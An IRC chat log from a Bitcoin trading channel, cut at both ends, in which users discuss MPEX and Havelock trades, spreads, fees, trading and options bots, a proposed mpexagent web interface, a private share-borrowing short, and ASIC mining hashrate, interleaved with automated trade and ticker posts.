gl :) Feb 03 21:32:32 what's up with the forums ... Feb 03 21:32:40 there has been a lot of downtime recently ... Feb 03 21:33:23 mircea_popescu: a lesson in freedom? Feb 03 21:34:17 forums back up Feb 03 21:34:39 Ukto_: does news show up in the chart in a similar way the dividend does? Feb 03 21:34:46 was. Feb 03 21:34:57 smickles: thats one of the things I am looking to add Feb 03 21:35:05 wont be hard at all Feb 03 21:35:17 Going to be adding user preferences Feb 03 21:35:22 to hide/show news, as well as divs Feb 03 21:35:39 and to set default views Feb 03 21:35:50 as well as localized time dispays Feb 03 21:35:56 EskimoBob_afk: i'm having a tough time 'catcing your drift'. could you rephrase that or elaborate? Feb 03 21:36:15 [HAVELOCK] [HIM] 3 @ 13.9 = 41.7 BTC [+] Feb 03 21:36:16 Someone bought another 10k of S.DICE pass through shares on BF :D Feb 03 21:36:19 smickles: sounds like a virus. Feb 03 21:36:32 DeaDTerra1: was just talking about that Feb 03 21:36:47 forums are back Feb 03 21:36:54 DeaDTerra1: its cool that I can use BF's webirc via my phone LOL Feb 03 21:37:05 haha nice ^^ Feb 03 21:37:32 thats how lame I am. bored at parents waiting on them Feb 03 21:37:49 That looks delicious Feb 03 21:37:53 DeaDTerra1, you still doing arb manually? Feb 03 21:38:21 spekaing of that terra Feb 03 21:43:59 out of context, terra sounds like a euphemism for ass Feb 03 21:45:45 cant be Feb 03 21:45:49 no one ever calls me terra Feb 03 21:45:52 :P Feb 03 21:45:58 yeah, you forgot to upkeep your passthrough Feb 03 21:46:16 Shares were selling too high Feb 03 21:46:36 think he only charges for divs Feb 03 21:48:05 He also charges a margin for shares he sells Feb 03 21:49:24 I'm seriously thinking I should just compete. Feb 03 21:53:46 [MPEX] [S.MPOE] 20252 @ 0.000675 = 13.6701 BTC [-] Feb 03 21:53:48 [MPEX] [S.MPOE] 6377 @ 0.00067499 = 4.3044 BTC [-] Feb 03 21:53:55 Why aren't people using coinbr? Feb 03 21:54:24 i heard they can't afford 0.09 BTC/month Feb 03 21:54:40 they do Feb 03 21:54:52 still, plenty of ppl like it. Feb 03 21:54:55 I do. Feb 03 21:55:02 I was debating using it to buy some bbet hehe Feb 03 21:55:03 lol, blockchain.info just gave me an error Feb 03 21:55:09 "Bitcoin not defined" Feb 03 21:55:35 [MPEX] [S.DICE] 49 @ 0.00739 = 0.3621 BTC [+] Feb 03 21:55:37 [MPEX] [S.DICE] 1000 @ 0.00738104 = 7.381 BTC [-] Feb 03 21:55:42 yeah they'are amusing.. i got windows xp booting gif the other day Feb 03 21:55:52 0,o Feb 03 21:55:58 frame it! Feb 03 21:56:02 heh, i got that once Feb 03 21:56:52 [MPEX] [S.MPOE] 5871 @ 0.00067499 = 3.9629 BTC [-] Feb 03 21:56:53 [MPEX] [S.MPOE] 4321 @ 0.0006726 = 2.9063 BTC [-] Feb 03 21:56:55 [MPEX] [S.MPOE] 13025 @ 0.00067259 = 8.7605 BTC [-] Feb 03 21:56:55 [MPEX] [S.MPOE] 2231 @ 0.00067232 = 1.4999 BTC [-] Feb 03 22:02:43 [MPEX] [S.MPOE] 4321 @ 0.0006817 = 2.9456 BTC [+] Feb 03 22:02:44 [MPEX] [S.MPOE] 5379 @ 0.00068187 = 3.6678 BTC [+] Feb 03 22:05:03 ;;ticker Feb 03 22:05:03 BTCUSD ticker | Best bid: 20.66002, Best ask: 20.73900, Bid-ask spread: 0.07898, Last trade: 20.73900, 24 hour volume: 31522.03367265, 24 hour low: 19.42000, 24 hour high: 20.75000, 24 hour vwap: 20.10086 Feb 03 22:10:29 http://www.wolframalpha.com/input/?i=bitcoin << hilarious Feb 03 22:13:08 charging 21 again eh? Feb 03 22:13:21 wolfram alp[ha is retarded Feb 03 22:19:32 ;;-22/(.11962553-1) Feb 03 22:19:33 Error: "-22/(.11962553-1)" is not a valid command. Feb 03 22:19:36 ;;calc -22/(.11962553-1) Feb 03 22:19:36 24.9893661728 Feb 03 22:21:14 hey all Feb 03 22:21:41 is it suberb owl sunday? Feb 03 22:22:19 [MPEX] [S.MPOE] 4321 @ 0.00067348 = 2.9101 BTC [-] Feb 03 22:22:21 [MPEX] [S.MPOE] 579 @ 0.00067347 = 0.3899 BTC [-] Feb 03 22:22:45 dub: yup Feb 03 22:23:17 is jurov still here? Feb 03 22:23:28 nope Feb 03 22:23:31 lol Feb 03 22:23:37 look at mpoe... Feb 03 22:23:51 1.22% spread...what is the bot doing? Feb 03 22:24:01 false hope? Feb 03 22:24:03 or is the bot there Feb 03 22:24:31 why would i, or the bot, want tight spread? Feb 03 22:24:37 just curious Feb 03 22:24:50 http://i.imgur.com/PVAKKNH.jpg?1 Feb 03 22:25:34 jurov: because a tight anus is less likely to get raped? Feb 03 22:25:38 i would obviously need to have it use pympex Feb 03 22:26:28 but there is still profit there...and i set it so that if you put a lot of volume, i go a satoshi cheaper...if it is thin in front, i wait behind for extra satoshi Feb 03 22:26:41 and yesterday, when i was watching Feb 03 22:26:51 mjr_ what you would do with big price movements? Feb 03 22:26:52 it wasn't close to the next higher or lower price Feb 03 22:27:26 they are quite common and usually cause simple frontrunners to get stuck on wrong end Feb 03 22:27:33 the stock is not too much...and although over its life it has moved a lot Feb 03 22:27:33 [MPEX] [S.MPOE] 4321 @ 0.00068184 = 2.9462 BTC [+] Feb 03 22:27:34 [MPEX] [S.MPOE] 7329 @ 0.00068187 = 4.9974 BTC [+] Feb 03 22:27:54 it doesn't seem like it is moving a ton, but of course, if i get filled on one end, i cancel orders and reassess Feb 03 22:28:22 again, until i actually register on mpex its all academic Feb 03 22:28:54 also the ultimate goal is not so much to scalp and front run, but rather build up as long a position as i can for the least money Feb 03 22:28:59 you will reassssess and find out that bid is is higher than last sell price.. what now? Feb 03 22:29:06 so i would weight it's priority to buy and sell accordingly Feb 03 22:29:51 as long as you are getting more than .4% (buy and sell) you are making money... Feb 03 22:30:09 i guess. Feb 03 22:30:12 although currently i am running it with .5% to ttest Feb 03 22:30:24 on each side (to mirror coinbr) Feb 03 22:30:33 ;;ticker Feb 03 22:30:33 BTCUSD ticker | Best bid: 20.48947, Best ask: 20.49800, Bid-ask spread: 0.00853, Last trade: 20.49800, 24 hour volume: 32327.68690484, 24 hour low: 19.42000, 24 hour high: 20.75000, 24 hour vwap: 20.12431 Feb 03 22:31:39 was sad to find out no api Feb 03 22:31:41 and as for the api, i'd really like it... but having the orders count suddenly increase 10x is just too big risk Feb 03 22:31:50 good point Feb 03 22:32:12 couldn't you set a limit on order number through api? Feb 03 22:32:23 x per hour Feb 03 22:32:25 or whatever Feb 03 22:32:51 i think the main way to do this would be with the options...the spreads are regularly 33%-50% Feb 03 22:32:57 that wouldn't exactly be the problem. suppose it blows up when i'm not around Feb 03 22:33:06 yeah that is my worry too Feb 03 22:33:15 i am gonna give my little guy only a little money to play with Feb 03 22:33:20 human will usually notice that the order got stuck.. bot no Feb 03 22:33:24 true Feb 03 22:33:34 that is the one part that i will have to test very rigorously Feb 03 22:33:39 maintaining positions Feb 03 22:33:48 since i am responsible to ask constantly Feb 03 22:34:05 i tested my bot several months... and still occassionally does snafu Feb 03 22:34:12 yeah true Feb 03 22:34:26 it happens to billion dollar companies (knight capital) Feb 03 22:34:57 but, as long as they are not killer mistakes (don't let the machine manage more than you can risk), you can fix it and make it stronger Feb 03 22:35:06 knight almost went under on one bad day... Feb 03 22:35:07 im curiouswhat results smickles comes up for his optiosn bot Feb 03 22:35:39 the volume is the part i haven't really figured out how to adjust for Feb 03 22:36:01 but overall, if i can say that in any given situation i am getting the best possible price, that is ok Feb 03 22:36:13 mjr_i did options, too. but you can wait like weeks till there's som movement Feb 03 22:36:53 maybe it got better since, but still they don't appear often in the ticker Feb 03 22:37:09 yeah, but i mean, i can say get 5 $20 calls...at 1 satoshi over current, and then if i ever get filled, just replace that order and then open up sell at 1 satoshi beneath Feb 03 22:37:13 nothing happening in options this month Feb 03 22:37:15 NOTHING Feb 03 22:37:16 i dn't care about 5 contracts so mucnh Feb 03 22:37:16 but if they do everyone watches alertly :D Feb 03 22:37:23 only me buying a bunch of calls Feb 03 22:37:37 its just that over the rest of the year, everyone sending market order will give me a tiny bit of money Feb 03 22:37:42 smickles trading a few here and there Feb 03 22:37:58 and my bot selling 1000s contracts to itself Feb 03 22:37:58 (if the bot is designed well) Feb 03 22:38:17 the bot is no longer on automatic mode :-P Feb 03 22:38:18 i think i am going to keep track of individual fill prices, so i can know if i should sell or not Feb 03 22:38:35 ;;ticker Feb 03 22:38:35 ie. sell THOSE shares that i got cheap, but no more Feb 03 22:38:35 BTCUSD ticker | Best bid: 20.48948, Best ask: 20.49800, Bid-ask spread: 0.00852, Last trade: 20.49800, 24 hour volume: 32329.47027016, 24 hour low: 19.42000, 24 hour high: 20.75000, 24 hour vwap: 20.12737 Feb 03 22:38:36 Someone also bought some expensive puts Feb 03 22:38:47 it will heat up in a week or two though Feb 03 22:38:59 yeah, its funny cuz everyone waits till the end Feb 03 22:39:03 mjr_really, how much do you willing to pay for ability to just doing it by simple select? Feb 03 22:39:15 go to coinbr.com/about, last paragraph Feb 03 22:39:40 Bugpowder it barely started. Feb 03 22:39:41 http://finance.yahoo.com/news/pension-funds-sue-blackrock-allege-192257561.html Feb 03 22:39:47 what a surprise Feb 03 22:39:55 were some puts too iirc Feb 03 22:39:57 blackrock buys iShares Feb 03 22:40:13 changees fee structure to take 40% Feb 03 22:40:18 of return Feb 03 22:40:35 Glad nobody is big enough to buy Vanguard. Feb 03 22:40:47 LOL Feb 03 22:40:51 look at last sentence... Feb 03 22:41:09 they are made because they are looting returns...best performer in their portfolio Feb 03 22:41:15 i wonder why Feb 03 22:41:36 do you mean select SQL command? Feb 03 22:41:51 yes Feb 03 22:42:08 The Laborers' Local 265 Pension Fund of Cincinnati and the Plumbers and Pipefitters Local No. 572 Pension Fund of Nashville Feb 03 22:42:08 would be nice i suppose, but parsing sql and parsing json is about the same effort Feb 03 22:42:12 that sounds hot. Feb 03 22:42:16 [HAVELOCK] [HIM] 1 @ 14.7 BTC [+] Feb 03 22:42:40 i would mostly just like an ack on order being received, and then an execution be sent if i got filled Feb 03 22:42:50 that would be awesome Feb 03 22:43:12 so i could build that engine to monitor my account and then update my positions and orders table Feb 03 22:43:20 jurov you open coinbr to what, direct sql access ? Feb 03 22:43:35 i think he was referring to licensing code to me Feb 03 22:43:37 no. that paragraph says "licensing the code" Feb 03 22:43:40 or having me contribute in some way Feb 03 22:43:49 which i think would be awesome Feb 03 22:44:13 i mean, i mostly wrote the spread finder cuz it was fun Feb 03 22:44:16 and i was curious Feb 03 22:44:16 [HAVELOCK] [SDICE] 3 @ 0.79353535 = 2.3806 BTC [+] Feb 03 22:44:23 [MPEX] [S.MPOE] 4879 @ 0.00067347 = 3.2859 BTC [-] Feb 03 22:44:42 python is easy and it is a nice way to try a PoC Feb 03 22:45:05 not sure about execution time etc, but i don't think i need to whip out the c++ yet, do I? Feb 03 22:45:16 PoC - proof of concept? Feb 03 22:45:20 yes Feb 03 22:45:29 i wanted to see if the crazy spreads i saw last night were real Feb 03 22:45:35 and if i could monitor them in real time Feb 03 22:45:36 c++ is not necessary Feb 03 22:45:40 didn't think so Feb 03 22:46:16 after that point, it would only be creating a position monitor, and then linking to a driver for pympex (or something at coinbr) Feb 03 22:46:39 i would have to write the position monitor, and i would have to write a driver so my orders could be translated to mpex orders Feb 03 22:46:52 have you seen mpexagent? Feb 03 22:46:57 not yet Feb 03 22:47:03 but i will look at it :) Feb 03 22:47:25 it's jsonrpc "driver" for mpex Feb 03 22:47:29 i mean, IDEALLY you could then use a lot of those pieces to build either a web based trading platform or an actual desktop application Feb 03 22:47:52 which i think would be a huge value to the trading community Feb 03 22:48:17 fuck is cool. That guy ain't. Shhhhiiitttt. http://www.youtube.com/watch?v=ckfBGdZoR_0 Feb 03 22:48:37 ie. integrated charts, depth of book, ticker, positions, executions, real time p&l Feb 03 22:48:42 i was thinking about adding fileserving fo mpexagent Feb 03 22:48:53 i am gonna look at the code now Feb 03 22:48:57 is it in python? Feb 03 22:49:00 yes Feb 03 22:49:04 plus twisted Feb 03 22:49:07 sweet, nice! Feb 03 22:49:20 i used django with python in my last web based project Feb 03 22:49:29 but i like twisted a lot Feb 03 22:49:55 my app wasn't performance oriented but rather i wanted the easy UI admin from django Feb 03 22:50:16 Lyspooner heh. Feb 03 22:50:44 well. so after it will be able to serve files, one just throw there some javascript that can do jsonrpc calls Feb 03 22:50:59 user goes to http://localhost:1077/ Feb 03 22:51:04 bam, nice mpex UI Feb 03 22:51:28 for the record, i think that guy must be posting out of about half the btctalk accounts Feb 03 22:51:49 yeah i figured it'd be easiest to use web so i wouldn't have to actually create charts in a desktop app Feb 03 22:51:54 which would not be fun i think Feb 03 22:52:09 i wanted to play with angular.js Feb 03 22:52:20 which i think would be PERFECT for a web based trading platform Feb 03 22:53:05 in fact, if you made that interface, you could actually use selenium for your trading bot, which would be pretty cool Feb 03 22:53:30 edit: i mean a browser based trading platform Feb 03 22:54:10 nice! so far it looked like everyone is too lazy and i'll have to add it to the agent myself Feb 03 22:55:12 did you look at angular? Feb 03 22:55:18 and if you want any help on it, i'm down Feb 03 22:55:26 also is your bot running right now? Feb 03 22:55:33 it is Feb 03 22:55:39 if so, why would it not just go 1 satoshi in front or behind Feb 03 22:55:43 and i didn't looked on angular Feb 03 22:55:54 i'm just curious Feb 03 22:56:05 and i was referring to mpoe Feb 03 22:56:08 it was originally intended for random stress testing Feb 03 22:56:12 ah ok Feb 03 22:56:30 just curious how you came up with bid/ask prices is all Feb 03 22:56:41 and i kept it so, i think it discourages others from jumping in front of it Feb 03 22:57:06 i think i just said "if volume less than 5000, go 1 satoshi behind, else go 1 satoshi in front Feb 03 22:57:38 you're close. actually it goes deeper ;) Feb 03 22:57:43 so that way if you have a small order, i am reasonably sure i'd get filled after you for one satoshi more Feb 03 22:57:54 yours goes deeper Feb 03 22:57:59 mine doesn't yet Feb 03 22:58:07 but i would find it very interesting to see them interact Feb 03 22:58:20 What next? "Hopefully some SURFIN. Feb 03 22:58:27 i put my code up earlier if anyone wanted to look Feb 03 22:58:33 its like 15 lines or something Feb 03 22:58:36 nothing special Feb 03 22:58:44 but you may need to install some libraries for it to work Feb 03 22:59:28 actually, i think that mirceau_popescu's idea behind his trading platform could be huge Feb 03 23:00:09 it could greatly simplify user interface, make a more robust system that is more secure, and easier to maintain, less vulnerable to single point of failure problems Feb 03 23:00:10 seems he enjoys bein calles mirceaU Feb 03 23:00:16 sorry bad typist Feb 03 23:00:17 *being called Feb 03 23:00:23 :) Feb 03 23:00:27 but i do try my best Feb 03 23:00:38 [MPEX] [S.MPOE] 4321 @ 0.00067371 = 2.9111 BTC [+] Feb 03 23:00:40 [MPEX] [S.MPOE] 2879 @ 0.00067347 = 1.9389 BTC [-] Feb 03 23:00:49 lol the spread is actually increasing on mpoe Feb 03 23:01:20 it is so much fun to watch this Feb 03 23:01:50 i think both mircea and coinbr's fees in fact affect order size distribution Feb 03 23:02:03 yes Feb 03 23:02:05 i think so too Feb 03 23:02:07 so unlike irl exchanges, small orders are rare Feb 03 23:02:14 but i account for fees Feb 03 23:02:20 and i don't think the fees are very high Feb 03 23:02:32 .2% or .5% is very small Feb 03 23:02:41 and its a fixed cost Feb 03 23:03:25 so with 1.24% on mpoe... i can make .84% every trade by basically just filling market orders Feb 03 23:03:51 .24% if i am going through coinbr Feb 03 23:04:24 and as i said, since my goal is to acquire a long position over time at the lowest possible price... Feb 03 23:04:35 it is not very risky (i want to get in the position) Feb 03 23:05:12 the options can be a bit trickier cuz they seem to be pretty thinly traded Feb 03 23:05:23 but if you buy the puts and the calls... Feb 03 23:05:25 [MPEX] [O.BTCUSD.P190T] 3 @ 0.10526446 = 0.3158 BTC [-] Feb 03 23:05:45 you are pretty well hedged Feb 03 23:06:00 [MPEX] [O.BTCUSD.C200T] 2 @ 0.12907935 = 0.2582 BTC [-] Feb 03 23:06:03 ooh, i just thought about designing a risk monitor Feb 03 23:06:31 [MPEX] [O.BTCUSD.P200T] 3 @ 0.12665781 = 0.38 BTC [-] Feb 03 23:06:46 (really should have one for any kind of automated system) Feb 03 23:07:04 [MPEX] [O.BTCUSD.C210T] 1 @ 0.10492991 BTC Feb 03 23:07:41 [MPEX] [O.BTCUSD.P210T] 1 @ 0.15161796 BTC Feb 03 23:08:14 jurov: why would a fixed percentage fee affect size of orders? you gain nothing by increasing your volume Feb 03 23:08:43 [MPEX] [S.MPOE] 4538 @ 0.00068187 = 3.0943 BTC [+] Feb 03 23:08:46 [MPEX] [S.MPOE] 4321 @ 0.00068238 = 2.9486 BTC [+] Feb 03 23:08:48 [MPEX] [S.MPOE] 11300 @ 0.00068239 = 7.711 BTC [+] Feb 03 23:08:49 no, the 30BTC /0.09monthly does it i think Feb 03 23:08:50 [MPEX] [S.MPOE] 10000 @ 0.00068518 = 6.8518 BTC [+] Feb 03 23:08:51 [MPEX] [S.MPOE] 1538 @ 0.0006852 = 1.0538 BTC [+] Feb 03 23:08:51 [MPEX] [S.MPOE] 16951 @ 0.00068521 = 11.615 BTC [+] Feb 03 23:08:52 [MPEX] [S.MPOE] 7578 @ 0.00068535 = 5.1936 BTC [+] Feb 03 23:08:53 [MPEX] [S.MPOE] 8650 @ 0.00068562 = 5.9306 BTC [+] Feb 03 23:08:54 [MPEX] [S.MPOE] 11550 @ 0.00068615 = 7.925 BTC [+] Feb 03 23:08:55 [MPEX] [S.MPOE] 7600 @ 0.0006867 = 5.2189 BTC [+] Feb 03 23:08:57 [MPEX] [S.MPOE] 19500 @ 0.00068689 = 13.3944 BTC [+] Feb 03 23:08:58 [MPEX] [S.MPOE] 13620 @ 0.00068695 = 9.3563 BTC [+] Feb 03 23:09:00 [MPEX] [S.MPOE] 13424 @ 0.00068711 = 9.2238 BTC [+] Feb 03 23:09:01 [MPEX] [S.MPOE] 59200 @ 0.00068749 = 40.6994 BTC [+] Feb 03 23:09:03 [MPEX] [S.MPOE] 18000 @ 0.00068849 = 12.3928 BTC [+] Feb 03 23:09:03 wow big order Feb 03 23:09:04 [MPEX] [S.MPOE] 13700 @ 0.00068941 = 9.4449 BTC [+] Feb 03 23:09:05 eh? Feb 03 23:09:06 [MPEX] [S.MPOE] 4400 @ 0.00068953 = 3.0339 BTC [+] Feb 03 23:09:10 spread jumped a ton Feb 03 23:09:16 [MPEX] [S.MPOE] 16994 @ 0.00068955 = 11.7182 BTC [+] Feb 03 23:09:17 [MPEX] [S.MPOE] 4829 @ 0.00068968 = 3.3305 BTC [+] Feb 03 23:09:18 [MPEX] [S.MPOE] 29320 @ 0.00069 = 20.2308 BTC [+] Feb 03 23:09:20 [MPEX] [S.MPOE] 13485 @ 0.00069027 = 9.3083 BTC [+] Feb 03 23:09:23 [MPEX] [S.MPOE] 2400 @ 0.00069193 = 1.6606 BTC [+] Feb 03 23:09:25 [MPEX] [S.MPOE] 13300 @ 0.00069255 = 9.2109 BTC [+] Feb 03 23:09:30 [MPEX] [S.MPOE] 1450 @ 0.00069336 = 1.0054 BTC [+] Feb 03 23:09:33 [MPEX] [S.MPOE] 18700 @ 0.00069339 = 12.9664 BTC [+] Feb 03 23:09:35 [MPEX] [S.MPOE] 14961 @ 0.0006935 = 10.3755 BTC [+] Feb 03 23:09:43 [MPEX] [S.MPOE] 13200 @ 0.00069366 = 9.1563 BTC [+] Feb 03 23:09:45 [MPEX] [S.MPOE] 6600 @ 0.0006937 = 4.5784 BTC [+] Feb 03 23:09:47 [MPEX] [S.MPOE] 7000 @ 0.00069419 = 4.8593 BTC [+] Feb 03 23:09:49 [MPEX] [S.MPOE] 18600 @ 0.00069428 = 12.9136 BTC [+] Feb 03 23:09:50 [MPEX] [S.MPOE] 6350 @ 0.00069526 = 4.4149 BTC [+] Feb 03 23:09:59 oh but yeah that is fixed, if you are going to be a trader, and i paid a one time/ or monthly fee Feb 03 23:10:00 [MPEX] [S.MPOE] 6450 @ 0.00069574 = 4.4875 BTC [+] Feb 03 23:10:02 [MPEX] [S.MPOE] 491 @ 0.00069577 = 0.3416 BTC [+] Feb 03 23:10:04 [MPEX] [S.DICE] 151 @ 0.00725041 = 1.0948 BTC [-] Feb 03 23:10:05 [MPEX] [S.DICE] 4895 @ 0.00739499 = 36.1985 BTC [+] Feb 03 23:10:10 [MPEX] [S.DICE] 114954 @ 0.007395 = 850.0848 BTC [+] Feb 03 23:10:12 i would make as many trades as possible to maximize my investment Feb 03 23:10:23 jeez. Feb 03 23:10:46 how'd the bot do jurov? Feb 03 23:11:15 heh. when s.dice moves it moves. Feb 03 23:11:16 [MPEX] [S.MPOE] 5800 @ 0.00067544 = 3.9176 BTC [-] Feb 03 23:11:17 [MPEX] [S.MPOE] 4321 @ 0.0006955 = 3.0053 BTC [+] Feb 03 23:11:19 [MPEX] [S.MPOE] 4321 @ 0.00069569 = 3.0061 BTC [+] Feb 03 23:11:20 [MPEX] [S.MPOE] 16526 @ 0.00069577 = 11.4983 BTC [+] Feb 03 23:11:21 [MPEX] [S.MPOE] 7625 @ 0.00069638 = 5.3099 BTC [+] Feb 03 23:11:30 [MPEX] [S.MPOE] 3450 @ 0.00069643 = 2.4027 BTC [+] Feb 03 23:11:31 you see how it is Feb 03 23:11:31 [MPEX] [S.MPOE] 19800 @ 0.00069732 = 13.8069 BTC [+] Feb 03 23:11:33 [MPEX] [S.MPOE] 5246 @ 0.00069745 = 3.6588 BTC [+] Feb 03 23:11:35 [MPEX] [S.MPOE] 5100 @ 0.00069748 = 3.5571 BTC [+] Feb 03 23:11:36 [MPEX] [S.MPOE] 5850 @ 0.00069876 = 4.0877 BTC [+] Feb 03 23:11:37 [MPEX] [S.MPOE] 14350 @ 0.00069927 = 10.0345 BTC [+] Feb 03 23:11:39 [MPEX] [S.MPOE] 15416 @ 0.00069939 = 10.7818 BTC [+] Feb 03 23:11:40 [MPEX] [S.MPOE] 19250 @ 0.00069978 = 13.4708 BTC [+] Feb 03 23:11:42 [MPEX] [S.MPOE] 30000 @ 0.00069998 = 20.9994 BTC [+] Feb 03 23:11:42 [MPEX] [S.MPOE] 10000 @ 0.00069999 = 6.9999 BTC [+] Feb 03 23:11:44 [MPEX] [S.MPOE] 30000 @ 0.00069999 = 20.9997 BTC [+] Feb 03 23:11:45 [MPEX] [S.MPOE] 2945 @ 0.00069999 = 2.0615 BTC [+] Feb 03 23:11:48 yeeehaw Feb 03 23:12:00 :) so much fun to watch Feb 03 23:12:29 it's official. i'm short s.mpoe now Feb 03 23:12:56 how do you do that? Feb 03 23:13:05 what, borrowed from customers ?! Feb 03 23:13:09 is that through coinbr? Feb 03 23:13:16 no i borrowed from smickles Feb 03 23:13:20 nice Feb 03 23:13:26 it's completely outside coinbr Feb 03 23:13:30 ah ok Feb 03 23:13:35 curious how well it works out. Feb 03 23:13:36 just my little private shenaigans Feb 03 23:13:42 yeah it is interesting Feb 03 23:14:11 its interesting to look at the differences...usually smickles could just say he will lend you the shares without actually transferring them Feb 03 23:14:14 and you could short... Feb 03 23:14:26 but i can see why that may not work Feb 03 23:14:35 why not transfer them ? Feb 03 23:14:44 but also with options...having to put up collateral before you exercise Feb 03 23:14:46 sign a gpg contract, do a push, Feb 03 23:14:50 full documentary trail. Feb 03 23:14:51 he did transfer them. an i did sold them Feb 03 23:14:54 yeah pretty easy Feb 03 23:14:56 !ticker m s.dice Feb 03 23:14:58 [MPEX:S.DICE] 1D: 0.00703438 / 0.00735783 / 0.007395 (214461 shares, 1,577.97 BTC), 7D: 0.00534524 / 0.00732888 / 0.00749999 (777731 shares, 5,699.90 BTC), 30D: 0.00085848 / 0.00510289 / 0.0075 (6065344 shares, 30,950.80 BTC) Feb 03 23:15:21 [16:14] sign a gpg contract, do a push, Feb 03 23:15:21 [16:14] full documentary trail. Feb 03 23:15:29 good point Feb 03 23:15:31 what if the other party doesn't return the shares? Feb 03 23:16:04 that is what i was thinking...you do insulate yourself from that risk on mirceau's side but smickles would have to go to the court i guess? Feb 03 23:16:12 then smickles will rate me -10 Feb 03 23:16:17 [HAVELOCK] [SDICE] 10 @ 0.77 = 7.7 BTC [-] Feb 03 23:16:19 ah ok Feb 03 23:16:23 [MPEX] [S.DICE] 150 @ 0.007395 = 1.1093 BTC [+] Feb 03 23:16:23 that is a nice way of doing it Feb 03 23:16:59 anyway i have much more than than that on my own left from ipo.. so i'm covered even if whale buys up to 0.001 Feb 03 23:17:36 i need to read up on traunch, not sure if that is the right spelling Feb 03 23:19:29 Namworld well obviously the problem of cp risk Feb 03 23:19:38 but i was talkingfrom the perspective of having the proof. Feb 03 23:20:12 jurov i don't get it, why borrow shares if you have shares ?! Feb 03 23:20:18 borrowing usually has costs Feb 03 23:20:28 yes Feb 03 23:20:52 Network total 25.511 Thash/s Feb 03 23:21:00 i tell ye... these asics aren't working as advertised. Feb 03 23:21:07 i thought there were only 2 of them Feb 03 23:21:10 im sorry i didn't take more bets on network diff last year. Feb 03 23:21:22 but i am kinda happy if that's the case cuz it puts my FPGA project back on track Feb 03 23:21:59 midnightmagic hey, you seen Keefe of late ? Feb 03 23:22:51 [MPEX] [S.MPOE] 2470 @ 0.00069518 = 1.7171 BTC [-] Feb 03 23:22:52 [MPEX] [S.MPOE] 5930 @ 0.00069998 = 4.1509 BTC [+] Feb 03 23:23:33 yes borrowing has costs. i just wanted to operate with bigger amount Feb 03 23:24:17 there's no ASIC deployed yet no, except like 2? Feb 03 23:24:45 actually i had only really heard of 1 that was testing on slush's Feb 03 23:24:49 but i really don't konw Feb 03 23:24:50 even these 2 should noticeably push the envelope Feb 03 23:25:15 How much hashing power are they? Feb 03 23:25:25 68000MH Feb 03 23:25:38 so 136 GH... Feb 03 23:25:44 0.136 TH Feb 03 23:26:07 on 25 TH network... it would get lost in the noise... Feb 03 23:26:37 ok i miscalculated somewhere Feb 03 23:27:17 68 GH each Feb 03 23:27:24 i have bets made in august and sept and oct and etc that diff will be under X Feb 03 23:27:34 where x is 100mn, 50mn, even 200mn Feb 03 23:27:47 network hashrate estimate varies 17500 - 27500 Ghash almost daily Feb 03 23:28:04 i've seen it as high as 33 Feb 03 23:28:16 just estimates tho based on luck Feb 03 23:29:30 yup Feb 03 23:29:57 Namworld, difficulty is weekly average and doesn't vary so much. the luck does apply, still Feb 03 23:30:10 *two-wekkly Feb 03 23:30:54 i think tomorrow we may see large jump Feb 03 23:31:10 on exchange rate Feb 03 23:32:04 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ << this is so funny. notice how the early yesses turn to later nos Feb 03 23:32:10 [BTCTC] [GSDPT] 100 @ 0.0075 = 0.75 BTC [+] Feb 03 23:32:12 i've facilitated shorts for people where I don't transfer the shares too, usually because they don't have mpex or broker accounts Feb 03 23:33:17 broker short. Feb 03 23:35:11 [MPEX] [S.MPOE] 2000 @ 0.00069617 = 1.3923 BTC [-] Feb 03 23:36:47 ;;ticker Feb 03 23:36:48 BTCUSD ticker | Best bid: 20.69731, Best ask: 20.74990, Bid-ask spread: 0.05259, Last trade: 20.74990, 24 hour volume: 32706.64412999, 24 hour low: 19.42000, 24 hour high: 20.75000, 24 hour vwap: 20.17193 Feb 03 23:37:16 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Feb 03 23:37:21 ;;calc 19/110526446 Feb 03 23:37:21 1.71904559385e-07 Feb 03 23:37:27 ;;calc 19/1.10526446 Feb 03 23:37:27 17.1904559385 Feb 03 23:37:51 [MPEX] [S.MPOE] 4321 @ 0.00067349 = 2.9102 BTC [-] Feb 03 23:37:53 [MPEX] [S.MPOE] 5000 @ 0.00067348 = 3.3674 BTC [-] Feb 03 23:37:54 [MPEX] [S.MPOE] 4663 @ 0.00067347 = 3.1404 BTC [-] Feb 03 23:37:55 [MPEX] [S.MPOE] 3566 @ 0.00067232 = 2.3975 BTC [-] Feb 03 23:41:06 [MPEX] [S.MPOE] 3576 @ 0.00067036 = 2.3972 BTC [-] Feb 03 23:42:05 [MPEX] [O.BTCUSD.C200T] 1 @ 0.12907935 BTC [-] Feb 03 23:44:43 yeah i guess since usually you don't clear immediately Feb 03 23:44:50 broker shorts are usually what happens in finance Feb 03 23:45:02 but i guess we can consider that we clear immediately? Feb 03 23:45:40 not sure if "clear" is even applicable in this context Feb 03 23:45:52 mjr_: you say the options are thinly traded? there were over 80 thousand of 'em traded last month Feb 03 23:46:05 is that all options? Feb 03 23:46:11 [MPEX] [S.DICE] 5000 @ 0.007395 = 36.975 BTC [+] Feb 03 23:46:16 [HAVELOCK] [KCIM] 1 @ 0.996 BTC [-] Feb 03 23:46:17 yeah, for mpoebot alone Feb 03 23:46:20 i mean that is a range of calls and puts somewhere around the current price Feb 03 23:46:27 yeah Feb 03 23:46:48 there are some people who buy/sell thousands at a time over a range Feb 03 23:46:57 and probably what i meant more than that was that in general, those 80,000 may have been 80 orders... Feb 03 23:47:02 over a month Feb 03 23:47:11 over at least 6 different instruments Feb 03 23:47:12 options are about 1/2 total trade volume really. Feb 03 23:47:14 ah, gotcha Feb 03 23:47:16 [HAVELOCK] [SDICE] 1 @ 0.78525252 BTC [+] Feb 03 23:47:35 yes, but when you conflate "options" with S.DICE it isn't fair Feb 03 23:47:42 since there are many different options Feb 03 23:47:43 mircea_popescu: the rss reports number of trads too, right? Feb 03 23:47:56 *trades Feb 03 23:47:58 so if you want to get into a market maker position, you have to hope you are there at the right time Feb 03 23:48:05 twice Feb 03 23:48:10 [MPEX] [S.MPOE] 745 @ 0.00067036 = 0.4994 BTC [-] Feb 03 23:48:11 [MPEX] [S.MPOE] 10000 @ 0.00067035 = 6.7035 BTC [-] Feb 03 23:48:14 [MPEX] [S.MPOE] 4666 @ 0.00067034 = 3.1278 BTC [-] Feb 03 23:48:31 it would be easy for S.DICE Feb 03 23:48:34 smickles the 12 most recent Feb 03 